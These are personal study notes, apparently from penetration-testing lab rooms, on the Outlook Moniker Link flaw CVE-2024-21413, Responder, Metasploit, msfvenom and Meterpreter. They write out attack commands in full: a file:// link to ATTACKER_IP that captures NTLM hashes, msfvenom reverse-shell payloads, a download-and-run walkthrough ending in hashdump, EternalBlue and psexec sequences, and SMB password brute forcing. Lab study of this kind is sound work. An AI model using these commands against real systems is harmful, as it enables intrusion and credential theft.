-------------Moniker Link (CVE-2024-21413)--------------------------

A Moniker Link:- special kind of hyperlink that points not to a website (like
https://...) but to a file or application on a system
The file:// protocol → Accesses local or shared files
The Windows Component Object Model (COM) → Lets Windows open/launch
applications or resources via URL
Example Moniker Link:
<a href="file://ATTACKER_IP/somefile">Click me</a>
When this link is clicked:
Outlook tries to fetch a file from a remote server
This uses SMB (Server Message Block) protocol
During the request, the victim's Windows credentials (NTLM hash) are
automatically sent to the remote SMB server
To protect users, Outlook uses Protected View:
When you open emails with suspicious content (attachments, external links,
macros)
It runs the email in a sandbox, disables macros, and blocks risky links
The Vulnerability (CVE-2024-21413)
Use a ! in the link:- <a href="file://attacker_ip/file!exploit">Click
me</a>
Bypasses the protection, and Outlook proceeds to connect to the remote
server.
Send the victim’s NTLMv2 hash (a Windows password hash)

Exploitation:-
Responder is a tool used by attackers or penetration testers to:
Capture network authentication requests.
Steal password hashes (especially NTLM hashes).
Trick machines into authenticating with the attacker's machine, thinking
it’s a legit network resource.
-> responder -I ens5
tells Responder to listen on interface ens5 (network adapter).
So if any Windows machine on the network tries to find a file share (SMB) or
misresolves a hostname, Responder tricks it into connecting to your machine —
and sends you its NTLMv2 hash.

📂
SMB - Server Message Block - lets computers on the same network:
Access shared files/folders

💬🖨️ Use shared printers

Communicate for file-related services
SMB sends credentials (NTLM hashes) during access attempts.
Detection:-
YARA is a tool used to detect malware or suspicious patterns in files, emails,
memory, etc. It’s often used by malware analysts and security teams.
Here YARA rule that looks for emails containing:
file://
— specifically used inside a Moniker Link

-----------------------------Metasploit-------------------------------
-> msfconsole
Metasploit is made of different modules — each designed for a specific task:
1.Auxiliary Modules Used for non-exploitation tasks like Scanning, sniffing,
crawling, etc.
2.Encoders Used to encode payloads to Bypass antivirus, Obfuscate the
code
3.Evasion Specifically avoid AV/Defender detection
4.Exploits Actual attack scripts
5.NOPs Padding used in shellcode (tells the CPU: "do nothing
for a moment".)
6.Payloads What runs on the target (e.g. shell, user creation)
Adapters: Reformat payloads (e.g., into PowerShell).
Singles: One-shot payloads; run immediately, no extra download.
Stagers: Set up a connection to download the main payload.(like a platform
to run the main payload(stages))
 Stages: The main payload downloaded and executed by the stager.
7.Post Modules What you do after hacking (e.g. privilege escalation)

Commands:-
-msfconsole
-use exploit/windows/smb/ms17_010_eternalblue -> use a context exploit
-show options -> print options related to the exploit we have chosen
-show payloads
-info -> Further information on any module
-back -> to go back out of the current context
-search {name} -> search the Metasploit Framework database for modules
relevant to the given search parameter.(search ms17-010)

Ranking of exploits
Excellent: Always works, never crashes (e.g., SQLi, RFI).
Great: Very reliable with version checks or app-specific logic.
Good: Works well on common/default setups (e.g., English Win7).
Normal: Works but version-specific, no auto-detect.
Average: Unreliable or difficult to exploit.
Low: Nearly impossible to exploit
Manual: Unstable, difficult to exploit, Mostly DoS or needs special setup to be
useful.

Parameters used often: (can be seen in "show options")

RHOSTS: “Remote host”, the IP address of the target system
RPORT: “Remote port”, the port on the target system the vulnerable application
is running on.
PAYLOAD: The payload you will use with the exploit.
LHOST: “Localhost”, the attacking machine (your AttackBox or Kali Linux) IP
address.
LPORT: “Local port”, the port you will use for the reverse shell to connect back
to. This is a port on your attacking machine, and you can set it to any port not
used by any other application.
SESSION: Each connection established to the target system using Metasploit will
have a session ID. You will use this with post-exploitation modules that will
connect to the target system using an existing connection.

-set rhost 10.10.10.212 -set the value in the current module/context

only...when switch to another, need to set again
-unset/unset all all (clear any parameter value or all )
-setg rhost 10.10.10.212 -set across all module at once
-exploit -Once all module parameters are set, you can launch the module
using the exploit command(exploitation)
-exploit -z -exploit -z run the exploit and background the session as
soon as it opens.

Once a vulnerability has been successfully exploited, a session will be created

will be in "meterpreter->"
it is the communication channel established between the target system and
Metasploit.
-background -to background the session prompt and go back to the msfconsole
prompt. (also ctrl z)
-sessions -to list active sessions
-sessions -i 2 -To interact with any session, use sessions -i command followed
by the desired session number.

-search portscan -> to list potential port scanning module

msf6 > nmap -sS 10.10.12.229 -> can run nmap cmds directly in this console

What is the "penny" user's SMB password? using smb_login module

-use smb_login
-show options
-set rhosts <target_ip>
-set SMBUser penny
 -set PASS_FILE <pathtowordlist>

Metasploit has a database function to simplify project management and avoid

possible confusion when setting up parameter values.
need to start the PostgreSQL database, by : systemctl start postgresql.
initialize the Metasploit Database using : msfdb init (if root :sudo -u
postgres msfdb init)
-msfconsole
-db_status
database feature will allow you to create workspaces to isolate different
projects. :workspace
add a new worspace : workspace -a tryhackme (to delete -d)
workspace -h command to list available options for the workspace command.
If you run a Nmap scan using the db_nmap shown below, all results will be
saved to the database.
db_nmap -sV -p- 10.10.12.229
-hosts/services -> to get relevent info related to the target
Once the host info is stored in the db, use the -> hosts -R to add this
value to the RHOSTS parameter.
-services -S netbios search for specific services in the environment.

Exploit-
-use eternalblue
-show payloads
-set payload 2 (the no from the list we want)
-set lhost 10.10.248.82 (ur ip)
-exploit
ctrl+z to run in background session
-sessions
-sessions -i 2 (session id from the list)

Msfvenom - Tool that helps:

Create malicious payloads (code that gives you control over a target).
Encode or obfuscate payloads.
Output payloads in different formats like .exe, .elf, .php, etc.
replaced msfpayload & msfencode -->msfvenom
Linux payload
-msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=4444
-f elf > shell.elf
-p payload u want
-f format > saving into a file
Windows payload
-msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=4444 -f
exe > shell.exe
PHP payload
-msfvenom -p php/reverse_php LHOST=10.10.X.X LPORT=7777 -f raw >
reverse.php
EDIT the file so it can start with "<?php" and end with "?>"
Python payload
-msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=8888 -f raw >
rev_shell.py
A handler listens for incoming connections from the payload.
-use exploit/multi/handler
-set payload linux/x64/meterpreter/reverse_tcp (set the same payload used
above)
-set LHOST 10.10.X.X
-set LPORT 4444
-run

1.Generate the PHP shell using MSFvenom

2.Start the Metasploit handler
3.Execute the PHP shell

STEP 1: Create the Malware File (called payload)

 on attackbox
-msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4444 -f
elf > shell.elf
STEP 2: Share that File
on attackbox
-python3 -m http.server 9000
STEP 3: Login to the Target Machine
on target
-ssh
-sudo so (to become root)
STEP 4: Download the Malware on Target
on target
-wget http://YOUR_ATTACKBOX_IP:9000/shell.elf
-chmod +x shell.elf
STEP 5: Start Listener to Catch the Connection
on attackbox
-msfconsole
-use exploit/multi/handler
-set payload linux/x64/meterpreter/reverse_tcp
-set LHOST YOUR_ATTACKBOX_IP
-set LPORT 4444
-run
STEP 6: Run the Malware on Target
on target
-./shell.elf
STEP 7: Steal Password Hashes
on attackbox
-sessions
-session -i 1
-background
Run hash stealing tool
-use post/linux/gather/hashdump
-set SESSION 1
-run

METERPRETER
-is a Metasploit payload that runs on the target system and provides
powerful tools for pen testing and remote control.
It runs in memory and does not write itself to the disk on the target(i.e not
installed to avoid detection)
Also avoid detection by IPS & IDS by using encrypted(TLS) communication with the
server(attacker)
Many version of meterpreter is there...which to use is based on 3 factors
1. target os(mac,linux,win)
2.components available on the target system
3.n/w connection type with the target
When you use some exploits, Metasploit automatically adds a suitable payload
like Meterpreter. You can change it if needed, but it picks a smart default to
help you get started faster.
Will be diff commands for diff meterpreter version
If you run the help command, you will see Meterpreter commands are listed under
different categories.
Core commands
File system commands
Networking commands
System commands
User interface commands
Webcam commands
Audio output commands
Elevate commands
Password database commands
Timestomp commands
Migrating to another process will help Meterpreter interact with it.
like migrating to word processor and capture key strokes
 -migrate 715 (PID)
The hashdump command will list the content of the SAM database (stores user's
passwords on Windows systems)
-hashdump
The search command is useful to locate files
-search -f flag.txt
The shell command will launch a regular command-line shell on the target system
-shell
To load additional tools
-load python / load kiwi etc...

Meterpreter-Exploit
-msfconsole
-use exploit/windows/smb/psexec
-set RHOSTS <Target_IP>
-set SMBUser ballen (given)
-set SMBPass Password1
-set PAYLOAD windows/meterpreter/reverse_tcp
-set LHOST <Your_Attacking_IP>
-exploit

then run required commands on the meterpreter console like

-sysinfo
-migrate pid
-search -f flag.txt etc

Windows blue exploiting

-nmap -sv -vv --script vuln target_ip
Got the open ports and vulnerablility(eternal blue ms17-010)